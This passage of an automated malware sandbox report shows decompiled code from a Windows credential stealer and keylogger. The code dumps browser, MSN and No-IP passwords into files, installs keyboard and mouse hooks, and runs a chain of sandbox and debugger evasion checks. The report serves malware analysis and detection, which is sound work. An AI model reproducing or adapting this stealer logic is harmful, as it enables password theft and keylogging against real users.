									CloseHandle(_t212);
								} else {
									CloseHandle(_t212);
									Sleep(0x3e8);
									_t107 =  *0x40d204; // 0x40e8f8
									_t212 = E00403568(0, 0, E00401F48( *_t107));
									_t111 = GetLastError();
									__eflags = _t111 - 0xb7;
									if(_t111 != 0xb7) {
										CloseHandle(_t212);
									} else {
										ExitProcess(0);
									}
								}
							}
						}
						__eflags =  *((char*)( *0x40d1dc)) - 1;
						if( *((char*)( *0x40d1dc)) != 1) {
							__eflags = 0;
							E004013A4(0, 0x40f1e8);
						} else {
							E004013A4(0,  &_v88);
							E00406B54(_v88, _t212,  &_v84, _t254, _t255); // executed
							E00401B14(0x40f1e8, _v84);
						}
						E00406008( &_v92);
						E00401D58( &_v92, "XX--XX--XX.txt");
						E0040B93C( *0x40f1e8, _t212, _v92, _t254, _t255, __eflags);
						_t80 =  *0x40d214; // 0x40e8f4
						__eflags =  *_t80 - 1;
						if(__eflags == 0) {
							E0040B7FC(_t212, _t254, _t255, __eflags);
							Sleep(0x3e8); // executed
						}
						E0040B3C0(_t212, _t213, _t254, _t255); // executed
						L43:
						_pop(_t229);
						 *[fs:eax] = _t229;
						_push(0x40c0cb);
						return E00401AE4( &_v92, 0x12);
					}
					CloseHandle(_t211);
					_t114 =  *0x40e670; // 0x400000
					SetWindowsHookExA(0xd, E0040B0B8, _t114, 0);
					_t117 =  *0x40e670; // 0x400000
					SetWindowsHookExA(0xe, E0040B108, _t117, 0);
					while(1) {
						_t120 = E0040BA84(__eflags);
						__eflags = _t120;
						if(_t120 != 0) {
							break;
						}
						E00405918();
					}
					ExitProcess(0);
					goto L26;
				}
				CloseHandle(_t210);
				E00409AD4( &_v24, _t210, _t255, _t261);
				E00401B14(0x40f1ec, _v24);
				_t262 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v28);
					E00401D58( &_v28, "NOIP.abc");
					_pop(_t222);
					E00405D70(_v28, _t210, _t222,  *0x40f1ec, _t255, _t262);
				}
				E00409D28( &_v32, _t210, _t254, _t255);
				_t235 = _v32;
				E00401B14(0x40f1ec, _v32);
				_t263 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v36);
					E00401D58( &_v36, "MSN.abc");
					_t235 =  *0x40f1ec;
					_pop(_t221);
					E00405D70(_v36, _t210, _t221,  *0x40f1ec, _t255, _t263);
				}
				E00409EF8( &_v40, _t210, _t235, _t254, _t255);
				E00401B14(0x40f1ec, _v40);
				_t264 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v44);
					E00401D58( &_v44, "FIREFOX.abc");
					_pop(_t220);
					E00405D70(_v44, _t210, _t220,  *0x40f1ec, _t255, _t264);
				}
				E00409A84( &_v48);
				E00401B14(0x40f1ec, _v48);
				_t265 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v52);
					E00401D58( &_v52, "IELOGIN.abc");
					_pop(_t219);
					E00405D70(_v52, _t210, _t219,  *0x40f1ec, _t255, _t265);
				}
				E00409A90( &_v56);
				E00401B14(0x40f1ec, _v56);
				_t266 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v60);
					E00401D58( &_v60, "IEPASS.abc");
					_pop(_t218);
					E00405D70(_v60, _t210, _t218,  *0x40f1ec, _t255, _t266);
				}
				E00409A9C( &_v64, _t254, _t255, _t266, _t270);
				E00401B14(0x40f1ec, _v64);
				_t267 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v68);
					E00401D58( &_v68, "IEAUTO.abc");
					_pop(_t217);
					E00405D70(_v68, _t210, _t217,  *0x40f1ec, _t255, _t267);
				}
				E00409AB8( &_v72, _t254, _t255, _t267);
				E00401B14(0x40f1ec, _v72);
				_t268 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v76);
					E00401D58( &_v76, "IEWEB.abc");
					_pop(_t216);
					E00405D70(_v76, _t210, _t216,  *0x40f1ec, _t255, _t268);
				}
				goto L43;
			}
























































                                    0x0040bbf4
                                    0x0040bbf4
                                    0x0040bbf5
                                    0x0040bbf7
                                    0x0040bbfc
                                    0x0040bbfc
                                    0x0040bbfe
                                    0x0040bc00
                                    0x0040bc00
                                    0x0040bc09
                                    0x0040bc10
                                    0x0040bc11
                                    0x0040bc16
                                    0x0040bc19
                                    0x0040bc25
                                    0x0040bc2a
                                    0x0040bc36
                                    0x0040bc4b
                                    0x0040bc38
                                    0x0040bc39
                                    0x0040bc43
                                    0x0040bc43
                                    0x0040bc59
                                    0x0040bc5e
                                    0x0040bc60
                                    0x0040bc65
                                    0x0040bc6a
                                    0x0040be9b
                                    0x0040bea9
                                    0x0040beae
                                    0x0040beb5
                                    0x0040beba
                                    0x0040bf06
                                    0x0040bf0b
                                    0x0040bf13
                                    0x0040bf1b
                                    0x0040bf20
                                    0x0040bf25
                                    0x0040bf2c
                                    0x0040bf2c
                                    0x0040bf31
                                    0x0040bf36
                                    0x0040bf3b
                                    0x0040bf40
                                    0x0040bf51
                                    0x0040bf56
                                    0x0040bf58
                                    0x0040bf5d
                                    0x0040bf62
                                    0x0040c02a
                                    0x0040bf68
                                    0x0040bf69
                                    0x0040bf73
                                    0x0040bf78
                                    0x0040bf8e
                                    0x0040bf90
                                    0x0040bf95
                                    0x0040bf9a
                                    0x0040c022
                                    0x0040bfa0
                                    0x0040bfa1
                                    0x0040bfab
                                    0x0040bfb0
                                    0x0040bfc6
                                    0x0040bfc8
                                    0x0040bfcd
                                    0x0040bfd2
                                    0x0040c01a
                                    0x0040bfd4
                                    0x0040bfd5
                                    0x0040bfdf
                                    0x0040bfe4
                                    0x0040bffa
                                    0x0040bffc
                                    0x0040c001
                                    0x0040c006
                                    0x0040c012
                                    0x0040c008
                                    0x0040c00a
                                    0x0040c00a
                                    0x0040c006
                                    0x0040bfd2
                                    0x0040bf9a
                                    0x0040c034
                                    0x0040c037
                                    0x0040c062
                                    0x0040c064
                                    0x0040c039
                                    0x0040c03e
                                    0x0040c049
                                    0x0040c056
                                    0x0040c056
                                    0x0040c06c
                                    0x0040c079
                                    0x0040c086
                                    0x0040c08b
                                    0x0040c090
                                    0x0040c093
                                    0x0040c095
                                    0x0040c09f
                                    0x0040c09f
                                    0x0040c0a4
                                    0x0040c0a9
                                    0x0040c0ab
                                    0x0040c0ae
                                    0x0040c0b1
                                    0x0040c0c3
                                    0x0040c0c3
                                    0x0040bebd
                                    0x0040bec4
                                    0x0040bed2
                                    0x0040bed9
                                    0x0040bee7
                                    0x0040bef3
                                    0x0040bef3
                                    0x0040bef8
                                    0x0040befa
                                    0x00000000
                                    0x00000000
                                    0x0040beee
                                    0x0040beee
                                    0x0040befe
                                    0x00000000
                                    0x0040befe
                                    0x0040bc71
                                    0x0040bc79
                                    0x0040bc86
                                    0x0040bc8b
                                    0x0040bc92
                                    0x0040bc9e
                                    0x0040bca2
                                    0x0040bcaf
                                    0x0040bcbd
                                    0x0040bcbe
                                    0x0040bcbe
                                    0x0040bcc6
                                    0x0040bccb
                                    0x0040bcd3
                                    0x0040bcd8
                                    0x0040bcdf
                                    0x0040bceb
                                    0x0040bcef
                                    0x0040bcfc
                                    0x0040bd04
                                    0x0040bd0a
                                    0x0040bd0b
                                    0x0040bd0b
                                    0x0040bd13
                                    0x0040bd20
                                    0x0040bd25
                                    0x0040bd2c
                                    0x0040bd38
                                    0x0040bd3c
                                    0x0040bd49
                                    0x0040bd57
                                    0x0040bd58
                                    0x0040bd58
                                    0x0040bd60
                                    0x0040bd6d
                                    0x0040bd72
                                    0x0040bd79
                                    0x0040bd85
                                    0x0040bd89
                                    0x0040bd96
                                    0x0040bda4
                                    0x0040bda5
                                    0x0040bda5
                                    0x0040bdad
                                    0x0040bdba
                                    0x0040bdbf
                                    0x0040bdc6
                                    0x0040bdd2
                                    0x0040bdd6
                                    0x0040bde3
                                    0x0040bdf1
                                    0x0040bdf2
                                    0x0040bdf2
                                    0x0040bdfa
                                    0x0040be07
                                    0x0040be0c
                                    0x0040be13
                                    0x0040be1f
                                    0x0040be23
                                    0x0040be30
                                    0x0040be3e
                                    0x0040be3f
                                    0x0040be3f
                                    0x0040be47
                                    0x0040be54
                                    0x0040be59
                                    0x0040be60
                                    0x0040be70
                                    0x0040be74
                                    0x0040be81
                                    0x0040be8f
                                    0x0040be90
                                    0x0040be90
                                    0x00000000

                                    APIs
                                    • GetLastError.KERNEL32(00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC2C
                                    • CloseHandle.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC39
                                    • Sleep.KERNEL32(00002EE0,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC43
                                    • CloseHandle.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC4B
                                      • Part of subcall function 00405D70: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DB6
                                      • Part of subcall function 00405D70: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DCE
                                      • Part of subcall function 00405D70: WriteFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DE4
                                      • Part of subcall function 00405D70: CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DEA
                                    • GetLastError.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC60
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC71
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BE9B
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEB0
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEBD
                                    • SetWindowsHookExA.USER32(0000000D,Function_0000B0B8,00400000,00000000), ref: 0040BED2
                                    • SetWindowsHookExA.USER32(0000000E,Function_0000B108,00400000,00000000), ref: 0040BEE7
                                      • Part of subcall function 0040BA84: GetLastError.KERNEL32(00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BA95
                                      • Part of subcall function 0040BA84: CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAA2
                                    • ExitProcess.KERNEL32(00000000,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEFE
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF06
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF2C
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF58
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF69
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF73
                                    • GetLastError.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF90
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFA1
                                    • Sleep.KERNEL32(000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFAB
                                    • GetLastError.KERNEL32(000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFC8
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFD5
                                    • Sleep.KERNEL32(000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFDF
                                    • GetLastError.KERNEL32(000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFFC
                                    • ExitProcess.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C00A
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C012
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C01A
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C09F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$ErrorLast$Sleep$File$CreateExitHookProcessWindows$MutexPointerWrite
                                    • String ID: FIREFOX.abc$IEAUTO.abc$IELOGIN.abc$IEPASS.abc$IEWEB.abc$MSN.abc$NOIP.abc$Restart$XX--XX--XX.txt$_x_X_BLOCKMOUSE_X_x_$_x_X_PASSWORDLIST_X_x_$_x_X_UPDATE_X_x_
                                    • API String ID: 3001352634-1131808598
                                    • Opcode ID: 62af1ef2336ec2e1ff34df4ac233d62ff794d0106d834388617ccd72b51add9f
                                    • Instruction ID: bdf70af56670c6b0a4a77e5acd908e49726916f33cb45a25643fdd496cb3d72a
                                    • Opcode Fuzzy Hash: 62af1ef2336ec2e1ff34df4ac233d62ff794d0106d834388617ccd72b51add9f
                                    • Instruction Fuzzy Hash: 36C10130640244EADB10FBA6DC82B9D77689F45309F50453BF501BB2E2DB7CAE45CAAD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B118, Relevance: 72.0, APIs: 29, Strings: 12, Instructions: 207COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 88%
                                    			E0040B118(void* __edx, void* __edi, void* __esi) {
				void* __ebx;
				char* _t1;
				char* _t2;
				char* _t3;
				char* _t4;
				char* _t5;
				char* _t6;
				char* _t7;
				char* _t8;
				char* _t9;
				char* _t10;
				char* _t11;
				char* _t12;
				char* _t13;
				long _t15;
				void* _t49;
				long _t58;
				void* _t62;
				void* _t63;
				intOrPtr* _t64;

				_t63 = __esi;
				_t62 = __edi;
				_t1 =  *0x40d1d4; // 0x40e8e0
				if( *_t1 == 1 && E004052EC() == 1) {
					ExitProcess(0);
				}
				_t2 =  *0x40d1b0; // 0x40e8e1
				if( *_t2 == 1 && L00405168(_t58, _t63) == 1) {
					ExitProcess(0);
				}
				_t3 =  *0x40d1fc; // 0x40e8e2
				if( *_t3 == 1 && E00405124() == 1) {
					ExitProcess(0);
				}
				_t4 =  *0x40d1ac; // 0x40e8e3
				_t71 =  *_t4 - 1;
				if( *_t4 == 1 && E004051CC(_t58, _t62, _t63, _t71) == 1) {
					ExitProcess(0);
				}
				_t5 =  *0x40d1f4; // 0x40e8e4
				if( *_t5 == 1 && E00405310() == 1) {
					ExitProcess(0);
				}
				_t6 =  *0x40d1c8; // 0x40e8e5
				if( *_t6 == 1 && E004054A4() == 1) {
					ExitProcess(0);
				}
				_t7 =  *0x40d1d0; // 0x40e8e6
				if( *_t7 == 1 && E004053EC() == 1) {
					ExitProcess(0);
				}
				_t8 =  *0x40d1c0; // 0x40e8e7
				if( *_t8 == 1 && E00405334() == 1) {
					ExitProcess(0);
				}
				_t9 =  *0x40d1f8; // 0x40e8e8
				_t81 =  *_t9 - 1;
				if( *_t9 == 1) {
					_t49 = E0040555C(_t58, _t62, _t63, _t81); // executed
					if(_t49 == 1) {
						ExitProcess(0);
					}
				}
				_t10 =  *0x40d1bc; // 0x40e8e9
				if( *_t10 == 1 && E0040588C() == 1) {
					ExitProcess(0);
				}
				_t11 =  *0x40d1b4; // 0x40e8ea
				if( *_t11 == 1 && E004056C0() == 1) {
					ExitProcess(0);
				}
				_t12 =  *0x40d200; // 0x40e8eb
				if( *_t12 == 1) {
					_t58 = GetTickCount();
					if(E00405750(L00405168) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004051CC) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004052EC) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E00405310) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E00405334) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004053EC) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004054A4) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E0040555C) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004056DC) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E00405770) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004057B4) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E0040588C) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004056C0) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E00405124) != 0) {
						ExitProcess(0);
					}
					if(E004056DC(_t58) == 1) {
						ExitProcess(0);
					}
				}
				_t13 =  *0x40d200; // 0x40e8eb
				if( *_t13 != 1) {
					L70:
					return _t13;
				} else {
					E00405770();
					_t15 = GetTickCount();
					_push(0);
					asm("cdq");
					 *_t64 =  *_t64 - _t58;
					asm("sbb [esp+0x4], edx");
					_t13 = _t15;
					if(0 != 0) {
						if(0 <= 0) {
							goto L70;
						}
						L69:
						ExitProcess(0);
						return _t13;
					}
					if(_t13 <= 0x1388) {
						goto L70;
					}
					goto L69;
				}
			}























                                    0x0040b118
                                    0x0040b118
                                    0x0040b119
                                    0x0040b121
                                    0x0040b12e
                                    0x0040b12e
                                    0x0040b133
                                    0x0040b13b
                                    0x0040b148
                                    0x0040b148
                                    0x0040b14d
                                    0x0040b155
                                    0x0040b162
                                    0x0040b162
                                    0x0040b167
                                    0x0040b16c
                                    0x0040b16f
                                    0x0040b17c
                                    0x0040b17c
                                    0x0040b181
                                    0x0040b189
                                    0x0040b196
                                    0x0040b196
                                    0x0040b19b
                                    0x0040b1a3
                                    0x0040b1b0
                                    0x0040b1b0
                                    0x0040b1b5
                                    0x0040b1bd
                                    0x0040b1ca
                                    0x0040b1ca
                                    0x0040b1cf
                                    0x0040b1d7
                                    0x0040b1e4
                                    0x0040b1e4
                                    0x0040b1e9
                                    0x0040b1ee
                                    0x0040b1f1
                                    0x0040b1f3
                                    0x0040b1fa
                                    0x0040b1fe
                                    0x0040b1fe
                                    0x0040b1fa
                                    0x0040b203
                                    0x0040b20b
                                    0x0040b218
                                    0x0040b218
                                    0x0040b21d
                                    0x0040b225
                                    0x0040b232
                                    0x0040b232
                                    0x0040b237
                                    0x0040b23f
                                    0x0040b24a
                                    0x0040b258
                                    0x0040b25c
                                    0x0040b25c
                                    0x0040b26d
                                    0x0040b271
                                    0x0040b271
                                    0x0040b282
                                    0x0040b286
                                    0x0040b286
                                    0x0040b297
                                    0x0040b29b
                                    0x0040b29b
                                    0x0040b2ac
                                    0x0040b2b0
                                    0x0040b2b0
                                    0x0040b2c1
                                    0x0040b2c5
                                    0x0040b2c5
                                    0x0040b2d6
                                    0x0040b2da
                                    0x0040b2da
                                    0x0040b2eb
                                    0x0040b2ef
                                    0x0040b2ef
                                    0x0040b300
                                    0x0040b304
                                    0x0040b304
                                    0x0040b315
                                    0x0040b319
                                    0x0040b319
                                    0x0040b32a
                                    0x0040b32e
                                    0x0040b32e
                                    0x0040b33f
                                    0x0040b343
                                    0x0040b343
                                    0x0040b354
                                    0x0040b358
                                    0x0040b358
                                    0x0040b369
                                    0x0040b36d
                                    0x0040b36d
                                    0x0040b379
                                    0x0040b37d
                                    0x0040b37d
                                    0x0040b379
                                    0x0040b382
                                    0x0040b38a
                                    0x0040b3be
                                    0x0040b3be
                                    0x0040b38c
                                    0x0040b38c
                                    0x0040b391
                                    0x0040b398
                                    0x0040b39c
                                    0x0040b39d
                                    0x0040b3a0
                                    0x0040b3a4
                                    0x0040b3a9
                                    0x0040b3b4
                                    0x00000000
                                    0x00000000
                                    0x0040b3b6
                                    0x0040b3b8
                                    0x00000000
                                    0x0040b3b8
                                    0x0040b3b0
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040b3b2

                                    APIs
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B12E
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B148
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B162
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B17C
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B196
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1B0
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1CA
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1E4
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1FE
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B218
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B232
                                    • GetTickCount.KERNEL32 ref: 0040B245
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B25C
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B271
                                      • Part of subcall function 004052EC: GetModuleHandleA.KERNEL32(SbieDll.dll,00000000,0040B128,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 004052F4
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B286
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B29B
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2B0
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2C5
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2DA
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2EF
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B304
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B319
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B32E
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B343
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B358
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B36D
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B37D
                                    • GetTickCount.KERNEL32 ref: 0040B391
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B3B8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$CountTick$HandleModule
                                    • String ID: @$@$@$@$@$@$@$@$@$@$@$@
                                    • API String ID: 835719275-1661000548
                                    • Opcode ID: 2d04ea2a89ea791a22f26319119734baed36b5ff42cd23ef58fe5dff59b77004
                                    • Instruction ID: c7fc4875350585e80c75c2e3c7c0fe252a246f454c130cd5c6e6d9ea2ff417f9
                                    • Opcode Fuzzy Hash: 2d04ea2a89ea791a22f26319119734baed36b5ff42cd23ef58fe5dff59b77004
                                    • Instruction Fuzzy Hash: 44618230964A006EEA107BA64A06B5F1749CF52349F84007BF9447F2D3DBFDCD415AAE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403A58, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 58libraryloadersynchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00403A58(void* __eax, void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _v20;
				long _v24;
				_Unknown_base(*)()* _v28;
				_Unknown_base(*)()* _v32;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t15;
				long _t17;
				void* _t19;
				void* _t23;
				void* _t24;
				void* _t31;
				long _t32;
				void* _t33;
				DWORD* _t34;

				_t25 = __ecx;
				_t34 =  &_v24;
				_t33 = __ecx;
				_t31 = __edx;
				_t23 = __eax;
				_t32 = 0;
				_v28 = GetProcAddress(GetModuleHandleA("kernel32"), "GetModuleHandleA");
				_v32 = GetProcAddress(GetModuleHandleA("kernel32"), "GetProcAddress");
				_v36 = GetProcAddress(GetModuleHandleA("kernel32"), "ExitThread");
				_t15 = E004037EC(_t23, _t23, _t25, _t33, _t31, 0); // executed
				_v20 = _t15;
				_t17 = E004037EC(_t23, _t23, _t25, _t31, _t31, 0); // executed
				_v24 = _t17;
				_t19 = E004038AC(_t23,  &_v36, E00403A28, 0, 0x14); // executed
				_t24 = _t19;
				if(_t24 != 0) {
					WaitForSingleObject(_t24, 0xffffffff);
					GetExitCodeThread(_t24, _t34);
					_t32 =  *_t34;
				}
				return _t32;
			}





















                                    0x00403a58
                                    0x00403a5c
                                    0x00403a5f
                                    0x00403a61
                                    0x00403a63
                                    0x00403a65
                                    0x00403a7c
                                    0x00403a95
                                    0x00403aae
                                    0x00403ab6
                                    0x00403abb
                                    0x00403ac3
                                    0x00403ac8
                                    0x00403adb
                                    0x00403ae0
                                    0x00403ae4
                                    0x00403ae9
                                    0x00403af0
                                    0x00403af5
                                    0x00403af5
                                    0x00403b01

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32,GetModuleHandleA), ref: 00403A71
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403A77
                                    • GetModuleHandleA.KERNEL32(kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403A8A
